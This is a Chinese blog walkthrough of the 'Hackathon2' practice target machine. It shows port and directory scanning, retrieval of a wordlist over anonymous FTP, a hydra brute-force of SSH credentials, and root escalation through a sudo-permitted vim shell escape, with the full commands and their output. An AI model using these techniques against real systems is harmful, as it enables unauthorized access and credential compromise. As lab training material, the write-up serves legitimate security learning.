打个靶机-Hackathon2

已于 2023-08-01 23:50:01 修改
阅读量90 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: 网络安全 web安全
于 2023-08-01 23:45:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dkeyi/article/details/132052948
版权
文章描述了一次对IP192.168.150.133的网络渗透测试过程,包括使用sudonmap探测开放端口、检测FTP和HTTP服务版本,以及通过gobusterdir和SSH爆破尝试登录。后续提权操作显示可能有权限提升的机会。
摘要由CSDN通过智能技术生成

信息收集:

$ sudo nmap -sT -p- 192.168.150.133

PORT     STATE SERVICE

21/tcp   open  ftp

80/tcp   open  http

7223/tcp open  unknown

$ sudo nmap -sV -sT -sC -O -p21,80,7223 192.168.150.133 -o nmap_all.txt

PORT     STATE SERVICE VERSION

21/tcp   open  ftp     vsftpd 3.0.3

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to ::ffff:192.168.150.129

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 1

|      vsFTPd 3.0.3 - secure, fast, stable

|_End of status

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| -rw-r--r--    1 1000     1000           47 Jun 18  2021 flag1.txt

|_-rw-r--r--    1 1000     1000          849 Jun 19  2021 word.dir

80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))

| http-robots.txt: 1 disallowed entry

|_*/

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: hackathon2

7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 704aa969c2d1682386bd858331ca800c (RSA)

|   256 a69ea418ada42b7eeaf85e63296e4f24 (ECDSA)

|_  256 4edba6d2ebb953a5d7210b4e57a5f5c1 (ED25519)

MAC Address: 00:0C:29:4C:E7:09 (VMware)

$ ​gobuster dir -u http://192.168.150.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,txt,html

/.html                (Status: 403) [Size: 280]

/index.html           (Status: 200) [Size: 1254]

/robots.txt           (Status: 200) [Size: 70]

/happy                (Status: 200) [Size: 110]

$ ​curl -L http://192.168.150.133/happy

找到注释信息

<!-- username: hackathonll >

FTP:

$ ftp 192.168.150.133

-rw-r--r--    1 1000     1000           47 Jun 18  2021 flag1.txt

-rw-r--r--    1 1000     1000          849 Jun 19  2021 word.dir

ftp>binary
ftp>get word.dir

获得一个字典

SSH爆破:

$ hydra -l hackathonll -P ./word.dir 192.168.150.133 -s 7223 ssh -f -vV

[7223][ssh] host: 192.168.150.133   login: hackathonll   password: Ti@gO

$ ssh hackathonll@192.168.150.133 -p 7223

提权:

$ sudo -l

(root) NOPASSWD: /usr/bin/vim

$ sudo vim

:!/bin/bash

root@hackathon:/home/hackathonll#

# cat flag2.txt

₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}

DingTom
关注
专栏目录
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值